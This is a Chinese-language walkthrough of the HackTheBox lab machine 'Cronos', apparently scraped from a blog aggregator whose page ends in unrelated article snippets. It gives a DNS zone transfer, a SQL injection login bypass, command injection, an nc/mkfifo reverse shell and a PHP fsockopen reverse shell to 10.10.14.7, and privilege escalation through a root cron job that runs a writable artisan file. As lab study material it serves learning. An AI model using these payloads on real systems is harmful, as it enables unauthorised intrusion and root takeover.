Linux/Cronos

Cronos

天热了,什么也不想干,拿以前的来凑个数

Enumeration

Nmap

扫描发现对外开放了22,53,80端口,使用nmap详细扫描这几个端口

┌──(kali㉿kali)-[~/vegetable/HTB/cronos]
└─$ nmap -sC -sV -p 22,53,80 -oA nmap 10.10.10.13
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-26 01:39 EST
Nmap scan report for 10.10.10.13
Host is up (0.33s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18b973826f26c7788f1b3988d802cee8 (RSA)
|   256 1ae606a6050bbb4192b028bf7fe5963b (ECDSA)
|_  256 1a0ee7ba00cc020104cda3a93f5e2220 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.29 seconds

根据nmap的结果,可以看到80端口是Apache的默认页面,53端口也是打开的,尝试使用nslookup来发现主机域名

┌──(kali㉿kali)-[~/vegetable/HTB/cronos]
└─$ nslookup 10.10.10.13 10.10.10.13
13.10.10.10.in-addr.arpa        name = ns1.cronos.htb.

将cronos.htb添加至/etc/hosts中,然后通过区域传输进一步枚举系统的子域名

┌──(kali㉿kali)-[~/vegetable/HTB/cronos]
└─$ dig axfr @10.10.10.13 cronos.htb; <<>> DiG 9.18.8-1-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 319 msec
;; SERVER: 10.10.10.13#53(10.10.10.13) (TCP)
;; WHEN: Tue Dec 26 01:48:58 EST 2023
;; XFR size: 7 records (messages 1, bytes 203)

经过尝试,发现访问www.cronos.htb是一个web页面

可是点击页面上的链接,却全部都跳到外部其他链接去了,名为laravel,搜索关键词发现laravel是一个php web框架

Exploitation

sql injection

而admin.cronos.htb是一个登录表单,简单试了一些弱口令发现不起作用,但是使用admin' or 1=1 -- -可以直接登录系统,看来有sql注入

登陆成功后会跳转到welcome.php,看到可以执行traceroute和ping命令,测试是否存在命令执行

直接在ip后添加 ;id 可以直接执行命令

使用反向shell命令

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.7 9001 >/tmp/f

在监听端会收到一个shell

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 9001                   
listening on [any] 9001 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.13] 48858
sh: 0: can't access tty; job control turned off
$ whoami
www-data

然后将该shell升级

Privilege Escalation

将linpeas下载至目标主机

www-data@cronos:/tmp$ wget http://10.10.14.7:8888/linpeas.sh
--2023-12-26 10:10:35--  http://10.10.14.7:8888/linpeas.sh
Connecting to 10.10.14.7:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847834 (828K) [text/x-sh]
Saving to: 'linpeas.sh'linpeas.sh          100%[===================>] 827.96K   246KB/s    in 3.4s    2023-12-26 10:10:39 (246 KB/s) - 'linpeas.sh' saved [847834/847834]

为脚本添加执行权限,然后执行,在Cron jobs中,有一行如下所示,表示每分钟都会以root身份执行一次该命令

╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

www-data用户对该文件有完全控制权限

www-data@cronos:/var/www/admin$ ls -al /var/www/laravel/artisan
ls -al /var/www/laravel/artisan
-rwxr-xr-x 1 www-data www-data 1646 Apr  9  2017 /var/www/laravel/artisan

该文件是php写的,尝试在文件最上面写入一个php反向连接shell(第4,5行),然后等待一分钟即可

www-data@cronos:/var/www/laravel$ cat artisan 
#!/usr/bin/env php
<?php
$sock=fsockopen("10.10.14.7",9002);
exec("sh <&3 >&3 2>&3");
/*

在监听端收到shell,是root

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 9002
listening on [any] 9002 ...connect to [10.10.14.7] from (UNKNOWN) [10.10.10.13] 43406
id
uid=0(root) gid=0(root) groups=0(root)

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/623759.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【Git教程】(十二)工作流之项目设置 — 何时使用工作流,工作流的结构,项目设置概述、执行过程及其实现 ~

Git教程 工作流之项目设置 1️⃣ 何时使用工作流2️⃣ 工作流的结构3️⃣ 概述4️⃣ 使用要求5️⃣ 执行过程及其实现5.1 基于项目目录创建一个新的版本库5.2 以文件访问的方式共享版本库5.3 用 Git daemon 来共享版本库5.4 用 HTTP 协议来共享版本库5.5 用 SSH 协议来共享版…

AI 业务应用经验:以零一万物的万知 AI 创作为例

作者&#xff1a;明明如月学长&#xff0c; CSDN 博客专家&#xff0c;大厂高级 Java 工程师&#xff0c;《性能优化方法论》作者、《解锁大厂思维&#xff1a;剖析《阿里巴巴Java开发手册》》、《再学经典&#xff1a;《Effective Java》独家解析》专栏作者。 热门文章推荐&am…

Redis集群机制及一个Redis架构演进实例

Replication&#xff08;主从复制&#xff09; Redis的replication机制允许slave从master那里通过网络传输拷贝到完整的数据备份&#xff0c;从而达到主从机制。为了实现主从复制&#xff0c;我们准备三个redis服务&#xff0c;依次命名为master&#xff0c;slave1&#xff0c…

win10 64位装三菱PLC软件出现oleaut32.dll拒绝访问

win10 64位装 三菱PLC软件GX works2出现以下情况&#xff1a;以下文件没有自注册或撤消注册 c:/Windows/SysWOW64/oleaut32.dll拒绝访问 经过百度说是兼容问题 解决方案&#xff1a;在安装包启动图标上右键-兼容性疑难解答-尝试建议的设置-测试程序。 点击测试程序后setup正常…

国产高性能DSP音频处理芯片 AI算法智能消原音 PTN1118方案

PTN1118植入帕特纳微AI&#xff08;SVS&#xff09;&#xff0c;实现将任意音源中人声部分消除&#xff0c;并在极大程度上保留伴奏&#xff0c;配合PTN 卡拉OK系列芯片&#xff0c;使传统音频设备更富娱乐性。 支持模拟与数字输入输出&#xff0c;数字接口支持从模式 人声消除…

视频太大怎么压缩变小?8种方法随时压缩视频大小

视频太大怎么压缩变小&#xff1f;视频压缩方式分为两种&#xff0c;有损压缩和无损压缩&#xff0c;什么是有损什么是无损压缩&#xff0c;什么时候视频用无损压缩更好&#xff1f;什么时候用有损压缩更好&#xff1f;如何调整视频参数实现基本无损压缩&#xff1f; 今天就借助…

市面上加密混淆软件的比较和推荐

引言 市面上有许多加密混淆软件可供开发者使用&#xff0c;但哪些软件是最好用的&#xff1f;哪些软件受到开发者的喜爱&#xff1f;本文将根据一次在CSDN上的投票结果&#xff0c;为大家介绍几款在程序员中普及度较高的加密软件。以下是投票结果&#xff0c;希望能对大家的选择…

中东跨境电商平台Noon注册开店步骤详解

中东地区&#xff0c;素以“满地富豪”闻名&#xff0c;同时拥有发达的电子商务环境与较高的居民消费水平&#xff0c;吸引了大量跨境电商从业者前来寻求商机。其中&#xff0c;Noon作为中东地区颇具人气的电商平台&#xff0c;自然而然成为了众多卖家开拓中东市场的首选平台。…

【k8s】:深入理解 Kubernetes 中的污点(Taints)与容忍度(Tolerations)

【k8s】&#xff1a;深入理解 Kubernetes 中的污点&#xff08;Taints&#xff09;与容忍度&#xff08;Tolerations&#xff09; 1、污点&#xff08;Taints&#xff09;2、容忍度&#xff08;Tolerations&#xff09;3、示例演示-测试污点的具体应用场景3.1 给节点打污点&…

《剑指 Offer》专项突破版 - 面试题 107 : 矩阵中的距离(C++ 实现)

题目链接&#xff1a;矩阵中的距离 题目&#xff1a; 输入一个由 0、1 组成的矩阵 M&#xff0c;请输出一个大小相同的矩阵 D&#xff0c;矩阵 D 中的每个格子是矩阵 M 中对应格子离最近的 0 的距离。水平或竖直方向相邻的两个格子的距离为 1。假设矩阵 M 中至少有一个 0。 …

Redis-缓存击穿-逻辑过期

Redis-缓存击穿-逻辑过期实现 缓存击穿&#xff1a;也称热点key问题&#xff0c;大量访问一个key&#xff0c;而这个key恰巧到期了&#xff0c;导致大量的请求访问数据库。增大数据库的负担。为了解决这个问题可以采用互斥锁或逻辑过期的方式解决。本章采用逻辑过期的方式解决…

React 组件生命周期对比:Class vs. 函数式

在 React 中&#xff0c;Class 组件和函数式组件的生命周期存在一些差异。通过对 React 中 Class 组件和函数式组件的生命周期进行对比&#xff0c;详细探讨了它们在设计哲学、生命周期管理和开发技巧上的异同。全面了解 React 中两种组件类型的生命周期特点&#xff0c;以及如…